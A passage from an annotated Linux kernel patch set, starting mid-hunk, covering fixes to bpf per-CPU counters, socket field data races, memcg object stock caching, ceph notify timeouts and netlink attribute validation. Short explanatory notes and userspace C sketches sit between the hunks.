++	 * handled by the kthread before kthread_stop() returns.
++	 */
++	wait_for_completion(&rcpu->kthread_running);
++
+ 	return rcpu;
+ 
+ free_prog:
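
The cpumap change replaces after-the-fact error handling in
cpu_map_kthread_stop() with a startup handshake: the kthread completes
kthread_running as its first action, and __cpu_map_entry_alloc() waits for it,
so a later kthread_stop() always finds a kthread that has entered its loop and
will drain pending frames. The same handshake in userspace terms; the
pthread/semaphore names are illustrative stand-ins for the completion API:

    #include <pthread.h>
    #include <semaphore.h>
    #include <stdbool.h>
    #include <stdio.h>

    static sem_t running;           /* plays the role of kthread_running */
    static volatile bool stop;

    static void *worker(void *arg)
    {
            (void)arg;
            sem_post(&running);     /* complete(&rcpu->kthread_running) */
            while (!stop)
                    ;               /* drain the queue, sleep, etc. */
            return NULL;
    }

    int main(void)
    {
            pthread_t t;

            sem_init(&running, 0, 0);
            pthread_create(&t, NULL, worker, NULL);
            sem_wait(&running);     /* wait_for_completion(): worker is live */
            stop = true;            /* only now is a "kthread_stop" safe */
            pthread_join(t, NULL);
            printf("worker stopped only after it had started\n");
            return 0;
    }
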
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 934332b3eb541..db1065daabb62 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -1133,6 +1133,11 @@ static int perf_mux_hrtimer_restart(struct perf_cpu_context *cpuctx)
+ 	return 0;
+ }
+ 
++static int perf_mux_hrtimer_restart_ipi(void *arg)
++{
++	return perf_mux_hrtimer_restart(arg);
++}
++
+ void perf_pmu_disable(struct pmu *pmu)
+ {
+ 	int *count = this_cpu_ptr(pmu->pmu_disable_count);
+@@ -11155,8 +11160,7 @@ perf_event_mux_interval_ms_store(struct device *dev,
+ 		cpuctx = per_cpu_ptr(pmu->pmu_cpu_context, cpu);
+ 		cpuctx->hrtimer_interval = ns_to_ktime(NSEC_PER_MSEC * timer);
+ 
+-		cpu_function_call(cpu,
+-			(remote_function_f)perf_mux_hrtimer_restart, cpuctx);
++		cpu_function_call(cpu, perf_mux_hrtimer_restart_ipi, cpuctx);
+ 	}
+ 	cpus_read_unlock();
+ 	mutex_unlock(&mux_interval_mutex);
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index 1642548892a8e..ad04390883ada 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -662,8 +662,7 @@ static DEFINE_PER_CPU(int, bpf_trace_nest_level);
+ BPF_CALL_5(bpf_perf_event_output, struct pt_regs *, regs, struct bpf_map *, map,
+ 	   u64, flags, void *, data, u64, size)
+ {
+-	struct bpf_trace_sample_data *sds = this_cpu_ptr(&bpf_trace_sds);
+-	int nest_level = this_cpu_inc_return(bpf_trace_nest_level);
++	struct bpf_trace_sample_data *sds;
+ 	struct perf_raw_record raw = {
+ 		.frag = {
+ 			.size = size,
+@@ -671,7 +670,11 @@ BPF_CALL_5(bpf_perf_event_output, struct pt_regs *, regs, struct bpf_map *, map,
+ 		},
+ 	};
+ 	struct perf_sample_data *sd;
+-	int err;
++	int nest_level, err;
++
++	preempt_disable();
++	sds = this_cpu_ptr(&bpf_trace_sds);
++	nest_level = this_cpu_inc_return(bpf_trace_nest_level);
+ 
+ 	if (WARN_ON_ONCE(nest_level > ARRAY_SIZE(sds->sds))) {
+ 		err = -EBUSY;
+@@ -690,9 +693,9 @@ BPF_CALL_5(bpf_perf_event_output, struct pt_regs *, regs, struct bpf_map *, map,
+ 	sd->sample_flags |= PERF_SAMPLE_RAW;
+ 
+ 	err = __bpf_perf_event_output(regs, map, flags, sd);
+-
+ out:
+ 	this_cpu_dec(bpf_trace_nest_level);
++	preempt_enable();
+ 	return err;
+ }
+ 
+@@ -717,7 +720,6 @@ static DEFINE_PER_CPU(struct bpf_trace_sample_data, bpf_misc_sds);
+ u64 bpf_event_output(struct bpf_map *map, u64 flags, void *meta, u64 meta_size,
+ 		     void *ctx, u64 ctx_size, bpf_ctx_copy_t ctx_copy)
+ {
+-	int nest_level = this_cpu_inc_return(bpf_event_output_nest_level);
+ 	struct perf_raw_frag frag = {
+ 		.copy		= ctx_copy,
+ 		.size		= ctx_size,
+@@ -734,8 +736,12 @@ u64 bpf_event_output(struct bpf_map *map, u64 flags, void *meta, u64 meta_size,
+ 	};
+ 	struct perf_sample_data *sd;
+ 	struct pt_regs *regs;
++	int nest_level;
+ 	u64 ret;
+ 
++	preempt_disable();
++	nest_level = this_cpu_inc_return(bpf_event_output_nest_level);
++
+ 	if (WARN_ON_ONCE(nest_level > ARRAY_SIZE(bpf_misc_sds.sds))) {
+ 		ret = -EBUSY;
+ 		goto out;
+@@ -751,6 +757,7 @@ u64 bpf_event_output(struct bpf_map *map, u64 flags, void *meta, u64 meta_size,
+ 	ret = __bpf_perf_event_output(regs, map, flags, sd);
+ out:
+ 	this_cpu_dec(bpf_event_output_nest_level);
++	preempt_enable();
+ 	return ret;
+ }
+ 
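
Both bpf_trace hunks move the this_cpu_inc_return() of the nest level inside
an explicit preempt_disable()/preempt_enable() pair: without it the task could
migrate CPUs between the increment and the decrement and corrupt another
CPU's counter, defeating the recursion guard. The guard itself is a bounded
re-entrancy counter, sketched below with a thread-local variable (thread-local
cannot exhibit the migration bug, only the bounding; do_output() and the limit
of 3 are illustrative):

    #include <stdio.h>

    /* Thread-local stand-in for the per-CPU nest counter; in the kernel
     * the counter is per CPU, which is why preemption must stay disabled
     * between the increment and the decrement. */
    static _Thread_local int nest_level;

    static int do_output(int depth)
    {
            int err = 0;

            if (++nest_level > 3) {         /* ARRAY_SIZE(sds->sds) above */
                    err = -16;              /* -EBUSY, as in the patch */
                    goto out;
            }
            if (depth > 0)
                    err = do_output(depth - 1);
    out:
            nest_level--;
            return err;
    }

    int main(void)
    {
            printf("depth 2: %d\n", do_output(2));  /* fits: 0 */
            printf("depth 5: %d\n", do_output(5));  /* too deep: -16 */
            return 0;
    }
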
+diff --git a/lib/Makefile b/lib/Makefile
+index 59bd7c2f793a7..5ffe72ec99797 100644
+--- a/lib/Makefile
++++ b/lib/Makefile
+@@ -81,8 +81,14 @@ obj-$(CONFIG_TEST_STATIC_KEYS) += test_static_key_base.o
+ obj-$(CONFIG_TEST_DYNAMIC_DEBUG) += test_dynamic_debug.o
+ obj-$(CONFIG_TEST_PRINTF) += test_printf.o
+ obj-$(CONFIG_TEST_SCANF) += test_scanf.o
++
+ obj-$(CONFIG_TEST_BITMAP) += test_bitmap.o
+ obj-$(CONFIG_TEST_STRSCPY) += test_strscpy.o
++ifeq ($(CONFIG_CC_IS_CLANG)$(CONFIG_KASAN),yy)
++# FIXME: Clang breaks test_bitmap_const_eval when KASAN and GCOV are enabled
++GCOV_PROFILE_test_bitmap.o := n
++endif
++
+ obj-$(CONFIG_TEST_UUID) += test_uuid.o
+ obj-$(CONFIG_TEST_XARRAY) += test_xarray.o
+ obj-$(CONFIG_TEST_MAPLE_TREE) += test_maple_tree.o
+diff --git a/lib/debugobjects.c b/lib/debugobjects.c
+index c46736210363a..dacb80c22c4f1 100644
+--- a/lib/debugobjects.c
++++ b/lib/debugobjects.c
+@@ -498,6 +498,15 @@ static void debug_print_object(struct debug_obj *obj, char *msg)
+ 	const struct debug_obj_descr *descr = obj->descr;
+ 	static int limit;
+ 
++	/*
++	 * Don't report if lookup_object_or_alloc() by the current thread
++	 * failed because lookup_object_or_alloc()/debug_objects_oom() by a
++	 * concurrent thread turned off debug_objects_enabled and cleared
++	 * the hash buckets.
++	 */
++	if (!debug_objects_enabled)
++		return;
++
+ 	if (limit < 5 && descr != descr_test) {
+ 		void *hint = descr->debug_hint ?
+ 			descr->debug_hint(obj->object) : NULL;
+diff --git a/lib/test_bitmap.c b/lib/test_bitmap.c
+index a8005ad3bd589..37a9108c4f588 100644
+--- a/lib/test_bitmap.c
++++ b/lib/test_bitmap.c
+@@ -1149,6 +1149,10 @@ static void __init test_bitmap_print_buf(void)
+ 	}
+ }
+ 
++/*
++ * FIXME: Clang breaks compile-time evaluations when KASAN and GCOV are enabled.
++ * To work around it, GCOV is force-disabled in Makefile for this configuration.
++ */
+ static void __init test_bitmap_const_eval(void)
+ {
+ 	DECLARE_BITMAP(bitmap, BITS_PER_LONG);
+@@ -1174,11 +1178,7 @@ static void __init test_bitmap_const_eval(void)
+ 	 * the compiler is fixed.
+ 	 */
+ 	bitmap_clear(bitmap, 0, BITS_PER_LONG);
+-#if defined(__s390__) && defined(__clang__)
+-	if (!const_test_bit(7, bitmap))
+-#else
+ 	if (!test_bit(7, bitmap))
+-#endif
+ 		bitmap_set(bitmap, 5, 2);
+ 
+ 	/* Equals to `unsigned long bitopvar = BIT(20)` */
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 3e8f1ad0fe9db..67b6d8238b3ed 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -3165,12 +3165,12 @@ void mod_objcg_state(struct obj_cgroup *objcg, struct pglist_data *pgdat,
+ 	 * accumulating over a page of vmstat data or when pgdat or idx
+ 	 * changes.
+ 	 */
+-	if (stock->cached_objcg != objcg) {
++	if (READ_ONCE(stock->cached_objcg) != objcg) {
+ 		old = drain_obj_stock(stock);
+ 		obj_cgroup_get(objcg);
+ 		stock->nr_bytes = atomic_read(&objcg->nr_charged_bytes)
+ 				? atomic_xchg(&objcg->nr_charged_bytes, 0) : 0;
+-		stock->cached_objcg = objcg;
++		WRITE_ONCE(stock->cached_objcg, objcg);
+ 		stock->cached_pgdat = pgdat;
+ 	} else if (stock->cached_pgdat != pgdat) {
+ 		/* Flush the existing cached vmstat data */
+@@ -3224,7 +3224,7 @@ static bool consume_obj_stock(struct obj_cgroup *objcg, unsigned int nr_bytes)
+ 	local_lock_irqsave(&memcg_stock.stock_lock, flags);
+ 
+ 	stock = this_cpu_ptr(&memcg_stock);
+-	if (objcg == stock->cached_objcg && stock->nr_bytes >= nr_bytes) {
++	if (objcg == READ_ONCE(stock->cached_objcg) && stock->nr_bytes >= nr_bytes) {
+ 		stock->nr_bytes -= nr_bytes;
+ 		ret = true;
+ 	}
+@@ -3236,7 +3236,7 @@ static bool consume_obj_stock(struct obj_cgroup *objcg, unsigned int nr_bytes)
+ 
+ static struct obj_cgroup *drain_obj_stock(struct memcg_stock_pcp *stock)
+ {
+-	struct obj_cgroup *old = stock->cached_objcg;
++	struct obj_cgroup *old = READ_ONCE(stock->cached_objcg);
+ 
+ 	if (!old)
+ 		return NULL;
+@@ -3289,7 +3289,7 @@ static struct obj_cgroup *drain_obj_stock(struct memcg_stock_pcp *stock)
+ 		stock->cached_pgdat = NULL;
+ 	}
+ 
+-	stock->cached_objcg = NULL;
++	WRITE_ONCE(stock->cached_objcg, NULL);
+ 	/*
+ 	 * The `old' objects needs to be released by the caller via
+ 	 * obj_cgroup_put() outside of memcg_stock_pcp::stock_lock.
+@@ -3300,10 +3300,11 @@ static struct obj_cgroup *drain_obj_stock(struct memcg_stock_pcp *stock)
+ static bool obj_stock_flush_required(struct memcg_stock_pcp *stock,
+ 				     struct mem_cgroup *root_memcg)
+ {
++	struct obj_cgroup *objcg = READ_ONCE(stock->cached_objcg);
+ 	struct mem_cgroup *memcg;
+ 
+-	if (stock->cached_objcg) {
+-		memcg = obj_cgroup_memcg(stock->cached_objcg);
++	if (objcg) {
++		memcg = obj_cgroup_memcg(objcg);
+ 		if (memcg && mem_cgroup_is_descendant(memcg, root_memcg))
+ 			return true;
+ 	}
+@@ -3322,10 +3323,10 @@ static void refill_obj_stock(struct obj_cgroup *objcg, unsigned int nr_bytes,
+ 	local_lock_irqsave(&memcg_stock.stock_lock, flags);
+ 
+ 	stock = this_cpu_ptr(&memcg_stock);
+-	if (stock->cached_objcg != objcg) { /* reset if necessary */
++	if (READ_ONCE(stock->cached_objcg) != objcg) { /* reset if necessary */
+ 		old = drain_obj_stock(stock);
+ 		obj_cgroup_get(objcg);
+-		stock->cached_objcg = objcg;
++		WRITE_ONCE(stock->cached_objcg, objcg);
+ 		stock->nr_bytes = atomic_read(&objcg->nr_charged_bytes)
+ 				? atomic_xchg(&objcg->nr_charged_bytes, 0) : 0;
+ 		allow_uncharge = true;	/* Allow uncharge when objcg changes */
+diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
+index eebe256104bc0..947ca580bb9a2 100644
+--- a/net/bluetooth/l2cap_sock.c
++++ b/net/bluetooth/l2cap_sock.c
+@@ -46,6 +46,7 @@ static const struct proto_ops l2cap_sock_ops;
+ static void l2cap_sock_init(struct sock *sk, struct sock *parent);
+ static struct sock *l2cap_sock_alloc(struct net *net, struct socket *sock,
+ 				     int proto, gfp_t prio, int kern);
++static void l2cap_sock_cleanup_listen(struct sock *parent);
+ 
+ bool l2cap_is_socket(struct socket *sock)
+ {
+@@ -1415,6 +1416,7 @@ static int l2cap_sock_release(struct socket *sock)
+ 	if (!sk)
+ 		return 0;
+ 
++	l2cap_sock_cleanup_listen(sk);
+ 	bt_sock_unlink(&l2cap_sk_list, sk);
+ 
+ 	err = l2cap_sock_shutdown(sock, SHUT_RDWR);
+diff --git a/net/ceph/osd_client.c b/net/ceph/osd_client.c
+index 4e4f1e4bc265a..c22bb06b450ee 100644
+--- a/net/ceph/osd_client.c
++++ b/net/ceph/osd_client.c
+@@ -3334,17 +3334,24 @@ static int linger_reg_commit_wait(struct ceph_osd_linger_request *lreq)
+ 	int ret;
+ 
+ 	dout("%s lreq %p linger_id %llu\n", __func__, lreq, lreq->linger_id);
+-	ret = wait_for_completion_interruptible(&lreq->reg_commit_wait);
++	ret = wait_for_completion_killable(&lreq->reg_commit_wait);
+ 	return ret ?: lreq->reg_commit_error;
+ }
+ 
+-static int linger_notify_finish_wait(struct ceph_osd_linger_request *lreq)
++static int linger_notify_finish_wait(struct ceph_osd_linger_request *lreq,
++				     unsigned long timeout)
+ {
+-	int ret;
++	long left;
+ 
+ 	dout("%s lreq %p linger_id %llu\n", __func__, lreq, lreq->linger_id);
+-	ret = wait_for_completion_interruptible(&lreq->notify_finish_wait);
+-	return ret ?: lreq->notify_finish_error;
++	left = wait_for_completion_killable_timeout(&lreq->notify_finish_wait,
++						ceph_timeout_jiffies(timeout));
++	if (left <= 0)
++		left = left ?: -ETIMEDOUT;
++	else
++		left = lreq->notify_finish_error; /* completed */
++
++	return left;
+ }
+ 
+ /*
+@@ -4896,7 +4903,8 @@ int ceph_osdc_notify(struct ceph_osd_client *osdc,
+ 	linger_submit(lreq);
+ 	ret = linger_reg_commit_wait(lreq);
+ 	if (!ret)
+-		ret = linger_notify_finish_wait(lreq);
++		ret = linger_notify_finish_wait(lreq,
++				 msecs_to_jiffies(2 * timeout * MSEC_PER_SEC));
+ 	else
+ 		dout("lreq %p failed to initiate notify %d\n", lreq, ret);
+ 
+diff --git a/net/core/bpf_sk_storage.c b/net/core/bpf_sk_storage.c
+index 94374d529ea42..ad01b1bea52e4 100644
+--- a/net/core/bpf_sk_storage.c
++++ b/net/core/bpf_sk_storage.c
+@@ -531,8 +531,11 @@ bpf_sk_storage_diag_alloc(const struct nlattr *nla_stgs)
+ 		return ERR_PTR(-EPERM);
+ 
+ 	nla_for_each_nested(nla, nla_stgs, rem) {
+-		if (nla_type(nla) == SK_DIAG_BPF_STORAGE_REQ_MAP_FD)
++		if (nla_type(nla) == SK_DIAG_BPF_STORAGE_REQ_MAP_FD) {
++			if (nla_len(nla) != sizeof(u32))
++				return ERR_PTR(-EINVAL);
+ 			nr_maps++;
++		}
+ 	}
+ 
+ 	diag = kzalloc(struct_size(diag, maps, nr_maps), GFP_KERNEL);
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 5625ed30a06f3..2758b3f7c0214 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -5030,13 +5030,17 @@ static int rtnl_bridge_setlink(struct sk_buff *skb, struct nlmsghdr *nlh,
+ 	br_spec = nlmsg_find_attr(nlh, sizeof(struct ifinfomsg), IFLA_AF_SPEC);
+ 	if (br_spec) {
+ 		nla_for_each_nested(attr, br_spec, rem) {
+-			if (nla_type(attr) == IFLA_BRIDGE_FLAGS) {
++			if (nla_type(attr) == IFLA_BRIDGE_FLAGS && !have_flags) {
+ 				if (nla_len(attr) < sizeof(flags))
+ 					return -EINVAL;
+ 
+ 				have_flags = true;
+ 				flags = nla_get_u16(attr);
+-				break;
++			}
++
++			if (nla_type(attr) == IFLA_BRIDGE_MODE) {
++				if (nla_len(attr) < sizeof(u16))
++					return -EINVAL;
+ 			}
+ 		}
+ 	}
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 0c1baa5517f11..3b5304f084ef3 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -800,7 +800,7 @@ EXPORT_SYMBOL(sock_no_linger);
+ void sock_set_priority(struct sock *sk, u32 priority)
+ {
+ 	lock_sock(sk);
+-	sk->sk_priority = priority;
++	WRITE_ONCE(sk->sk_priority, priority);
+ 	release_sock(sk);
+ }
+ EXPORT_SYMBOL(sock_set_priority);
+@@ -977,7 +977,7 @@ EXPORT_SYMBOL(sock_set_rcvbuf);
+ static void __sock_set_mark(struct sock *sk, u32 val)
+ {
+ 	if (val != sk->sk_mark) {
+-		sk->sk_mark = val;
++		WRITE_ONCE(sk->sk_mark, val);
+ 		sk_dst_reset(sk);
+ 	}
+ }
+@@ -996,7 +996,7 @@ static void sock_release_reserved_memory(struct sock *sk, int bytes)
+ 	bytes = round_down(bytes, PAGE_SIZE);
+ 
+ 	WARN_ON(bytes > sk->sk_reserved_mem);
+-	sk->sk_reserved_mem -= bytes;
++	WRITE_ONCE(sk->sk_reserved_mem, sk->sk_reserved_mem - bytes);
+ 	sk_mem_reclaim(sk);
+ }
+ 
+@@ -1033,7 +1033,8 @@ static int sock_reserve_memory(struct sock *sk, int bytes)
+ 	}
+ 	sk->sk_forward_alloc += pages << PAGE_SHIFT;
+ 
+-	sk->sk_reserved_mem += pages << PAGE_SHIFT;
++	WRITE_ONCE(sk->sk_reserved_mem,
++		   sk->sk_reserved_mem + (pages << PAGE_SHIFT));
+ 
+ 	return 0;
+ }
+@@ -1202,7 +1203,7 @@ set_sndbuf:
+ 		if ((val >= 0 && val <= 6) ||
+ 		    sockopt_ns_capable(sock_net(sk)->user_ns, CAP_NET_RAW) ||
+ 		    sockopt_ns_capable(sock_net(sk)->user_ns, CAP_NET_ADMIN))
+-			sk->sk_priority = val;
++			WRITE_ONCE(sk->sk_priority, val);
+ 		else
+ 			ret = -EPERM;
+ 		break;
+@@ -1425,7 +1426,8 @@ set_sndbuf:
+ 			cmpxchg(&sk->sk_pacing_status,
+ 				SK_PACING_NONE,
+ 				SK_PACING_NEEDED);
+-		sk->sk_max_pacing_rate = ulval;
++		/* Pairs with READ_ONCE() from sk_getsockopt() */
++		WRITE_ONCE(sk->sk_max_pacing_rate, ulval);
+ 		sk->sk_pacing_rate = min(sk->sk_pacing_rate, ulval);
+ 		break;
+ 		}
+@@ -1520,7 +1522,9 @@ set_sndbuf:
+ 		}
+ 		if ((u8)val == SOCK_TXREHASH_DEFAULT)
+ 			val = READ_ONCE(sock_net(sk)->core.sysctl_txrehash);
+-		/* Paired with READ_ONCE() in tcp_rtx_synack() */
++		/* Paired with READ_ONCE() in tcp_rtx_synack()
++		 * and sk_getsockopt().
++		 */
+ 		WRITE_ONCE(sk->sk_txrehash, (u8)val);
+ 		break;
+ 
+@@ -1620,11 +1624,11 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case SO_SNDBUF:
+-		v.val = sk->sk_sndbuf;
++		v.val = READ_ONCE(sk->sk_sndbuf);
+ 		break;
+ 
+ 	case SO_RCVBUF:
+-		v.val = sk->sk_rcvbuf;
++		v.val = READ_ONCE(sk->sk_rcvbuf);
+ 		break;
+ 
+ 	case SO_REUSEADDR:
+@@ -1666,7 +1670,7 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case SO_PRIORITY:
+-		v.val = sk->sk_priority;
++		v.val = READ_ONCE(sk->sk_priority);
+ 		break;
+ 
+ 	case SO_LINGER:
+@@ -1713,7 +1717,7 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case SO_RCVLOWAT:
+-		v.val = sk->sk_rcvlowat;
++		v.val = READ_ONCE(sk->sk_rcvlowat);
+ 		break;
+ 
+ 	case SO_SNDLOWAT:
+@@ -1792,7 +1796,7 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 		return security_socket_getpeersec_stream(sock, optval.user, optlen.user, len);
+ 
+ 	case SO_MARK:
+-		v.val = sk->sk_mark;
++		v.val = READ_ONCE(sk->sk_mark);
+ 		break;
+ 
+ 	case SO_RCVMARK:
+@@ -1811,7 +1815,7 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 		if (!sock->ops->set_peek_off)
+ 			return -EOPNOTSUPP;
+ 
+-		v.val = sk->sk_peek_off;
++		v.val = READ_ONCE(sk->sk_peek_off);
+ 		break;
+ 	case SO_NOFCS:
+ 		v.val = sock_flag(sk, SOCK_NOFCS);
+@@ -1841,7 +1845,7 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 
+ #ifdef CONFIG_NET_RX_BUSY_POLL
+ 	case SO_BUSY_POLL:
+-		v.val = sk->sk_ll_usec;
++		v.val = READ_ONCE(sk->sk_ll_usec);
+ 		break;
+ 	case SO_PREFER_BUSY_POLL:
+ 		v.val = READ_ONCE(sk->sk_prefer_busy_poll);
+@@ -1849,12 +1853,14 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ #endif
+ 
+ 	case SO_MAX_PACING_RATE:
++		/* The READ_ONCE() pairs with the WRITE_ONCE() in sk_setsockopt() */
+ 		if (sizeof(v.ulval) != sizeof(v.val) && len >= sizeof(v.ulval)) {
+ 			lv = sizeof(v.ulval);
+-			v.ulval = sk->sk_max_pacing_rate;
++			v.ulval = READ_ONCE(sk->sk_max_pacing_rate);
+ 		} else {
+ 			/* 32bit version */
+-			v.val = min_t(unsigned long, sk->sk_max_pacing_rate, ~0U);
++			v.val = min_t(unsigned long, ~0U,
++				      READ_ONCE(sk->sk_max_pacing_rate));
+ 		}
+ 		break;
+ 
+@@ -1922,11 +1928,12 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case SO_RESERVE_MEM:
+-		v.val = sk->sk_reserved_mem;
++		v.val = READ_ONCE(sk->sk_reserved_mem);
+ 		break;
+ 
+ 	case SO_TXREHASH:
+-		v.val = sk->sk_txrehash;
++		/* Paired with WRITE_ONCE() in sk_setsockopt() */
++		v.val = READ_ONCE(sk->sk_txrehash);
+ 		break;
+ 
+ 	default:
+@@ -3112,7 +3119,7 @@ EXPORT_SYMBOL(__sk_mem_reclaim);
+ 
+ int sk_set_peek_off(struct sock *sk, int val)
+ {
+-	sk->sk_peek_off = val;
++	WRITE_ONCE(sk->sk_peek_off, val);
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(sk_set_peek_off);
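
Nearly every sock.c hunk above is one transformation applied repeatedly:
socket fields that lockless readers may observe (sk_priority, sk_mark,
sk_peek_off, sk_reserved_mem, and friends) have their plain loads and stores
annotated. A condensed sketch of the convention, using sk_priority as the
example field (demo_* names are illustrative):

  #include <net/sock.h>

  /* The writer holds the socket lock, but sk_getsockopt() and the TX
   * paths read sk_priority without it, so the store must be marked.
   */
  static void demo_set_priority(struct sock *sk, u32 prio)
  {
  	lock_sock(sk);
  	WRITE_ONCE(sk->sk_priority, prio);
  	release_sock(sk);
  }

  /* Lockless reader: the marked load pairs with the store above,
   * preventing load/store tearing and silencing KCSAN reports.
   */
  static u32 demo_get_priority(const struct sock *sk)
  {
  	return READ_ONCE(sk->sk_priority);
  }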
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index d382672018928..c84e5073c0b66 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -117,7 +117,6 @@ static void sock_map_sk_acquire(struct sock *sk)
+ 	__acquires(&sk->sk_lock.slock)
+ {
+ 	lock_sock(sk);
+-	preempt_disable();
+ 	rcu_read_lock();
+ }
+ 
+@@ -125,7 +124,6 @@ static void sock_map_sk_release(struct sock *sk)
+ 	__releases(&sk->sk_lock.slock)
+ {
+ 	rcu_read_unlock();
+-	preempt_enable();
+ 	release_sock(sk);
+ }
+ 
+diff --git a/net/dcb/dcbnl.c b/net/dcb/dcbnl.c
+index dc4fb699b56c3..d2981e89d3638 100644
+--- a/net/dcb/dcbnl.c
++++ b/net/dcb/dcbnl.c
+@@ -946,7 +946,7 @@ static int dcbnl_bcn_setcfg(struct net_device *netdev, struct nlmsghdr *nlh,
+ 		return -EOPNOTSUPP;
+ 
+ 	ret = nla_parse_nested_deprecated(data, DCB_BCN_ATTR_MAX,
+-					  tb[DCB_ATTR_BCN], dcbnl_pfc_up_nest,
++					  tb[DCB_ATTR_BCN], dcbnl_bcn_nest,
+ 					  NULL);
+ 	if (ret)
+ 		return ret;
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index c0fd8f5f3b94e..b51ce6f8ceba0 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -237,8 +237,8 @@ static int dccp_v6_send_response(const struct sock *sk, struct request_sock *req
+ 		opt = ireq->ipv6_opt;
+ 		if (!opt)
+ 			opt = rcu_dereference(np->opt);
+-		err = ip6_xmit(sk, skb, &fl6, sk->sk_mark, opt, np->tclass,
+-			       sk->sk_priority);
++		err = ip6_xmit(sk, skb, &fl6, READ_ONCE(sk->sk_mark), opt,
++			       np->tclass, sk->sk_priority);
+ 		rcu_read_unlock();
+ 		err = net_xmit_eval(err);
+ 	}
+diff --git a/net/ipv4/inet_diag.c b/net/ipv4/inet_diag.c
+index b812eb36f0e36..f7426926a1041 100644
+--- a/net/ipv4/inet_diag.c
++++ b/net/ipv4/inet_diag.c
+@@ -150,7 +150,7 @@ int inet_diag_msg_attrs_fill(struct sock *sk, struct sk_buff *skb,
+ 	}
+ #endif
+ 
+-	if (net_admin && nla_put_u32(skb, INET_DIAG_MARK, sk->sk_mark))
++	if (net_admin && nla_put_u32(skb, INET_DIAG_MARK, READ_ONCE(sk->sk_mark)))
+ 		goto errout;
+ 
+ 	if (ext & (1 << (INET_DIAG_CLASS_ID - 1)) ||
+@@ -799,7 +799,7 @@ int inet_diag_bc_sk(const struct nlattr *bc, struct sock *sk)
+ 	entry.ifindex = sk->sk_bound_dev_if;
+ 	entry.userlocks = sk_fullsock(sk) ? sk->sk_userlocks : 0;
+ 	if (sk_fullsock(sk))
+-		entry.mark = sk->sk_mark;
++		entry.mark = READ_ONCE(sk->sk_mark);
+ 	else if (sk->sk_state == TCP_NEW_SYN_RECV)
+ 		entry.mark = inet_rsk(inet_reqsk(sk))->ir_mark;
+ 	else if (sk->sk_state == TCP_TIME_WAIT)
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index 7b4ab545c06e0..acfe58d2f1dd7 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -182,9 +182,9 @@ int ip_build_and_send_pkt(struct sk_buff *skb, const struct sock *sk,
+ 		ip_options_build(skb, &opt->opt, daddr, rt);
+ 	}
+ 
+-	skb->priority = sk->sk_priority;
++	skb->priority = READ_ONCE(sk->sk_priority);
+ 	if (!skb->mark)
+-		skb->mark = sk->sk_mark;
++		skb->mark = READ_ONCE(sk->sk_mark);
+ 
+ 	/* Send it out. */
+ 	return ip_local_out(net, skb->sk, skb);
+@@ -526,8 +526,8 @@ packet_routed:
+ 			     skb_shinfo(skb)->gso_segs ?: 1);
+ 
+ 	/* TODO : should we use skb->sk here instead of sk ? */
+-	skb->priority = sk->sk_priority;
+-	skb->mark = sk->sk_mark;
++	skb->priority = READ_ONCE(sk->sk_priority);
++	skb->mark = READ_ONCE(sk->sk_mark);
+ 
+ 	res = ip_local_out(net, sk, skb);
+ 	rcu_read_unlock();
+diff --git a/net/ipv4/ip_sockglue.c b/net/ipv4/ip_sockglue.c
+index a7fd035b5b4f9..63aa52becd880 100644
+--- a/net/ipv4/ip_sockglue.c
++++ b/net/ipv4/ip_sockglue.c
+@@ -591,7 +591,7 @@ void __ip_sock_set_tos(struct sock *sk, int val)
+ 	}
+ 	if (inet_sk(sk)->tos != val) {
+ 		inet_sk(sk)->tos = val;
+-		sk->sk_priority = rt_tos2priority(val);
++		WRITE_ONCE(sk->sk_priority, rt_tos2priority(val));
+ 		sk_dst_reset(sk);
+ 	}
+ }
+diff --git a/net/ipv4/raw.c b/net/ipv4/raw.c
+index 86197634dcf5d..639aa5abda9dd 100644
+--- a/net/ipv4/raw.c
++++ b/net/ipv4/raw.c
+@@ -346,7 +346,7 @@ static int raw_send_hdrinc(struct sock *sk, struct flowi4 *fl4,
+ 		goto error;
+ 	skb_reserve(skb, hlen);
+ 
+-	skb->priority = sk->sk_priority;
++	skb->priority = READ_ONCE(sk->sk_priority);
+ 	skb->mark = sockc->mark;
+ 	skb->tstamp = sockc->transmit_time;
+ 	skb_dst_set(skb, &rt->dst);
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index cd1fa9f70f1a1..51bd9a50a1d1d 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -518,7 +518,7 @@ static void __build_flow_key(const struct net *net, struct flowi4 *fl4,
+ 		const struct inet_sock *inet = inet_sk(sk);
+ 
+ 		oif = sk->sk_bound_dev_if;
+-		mark = sk->sk_mark;
++		mark = READ_ONCE(sk->sk_mark);
+ 		tos = ip_sock_rt_tos(sk);
+ 		scope = ip_sock_rt_scope(sk);
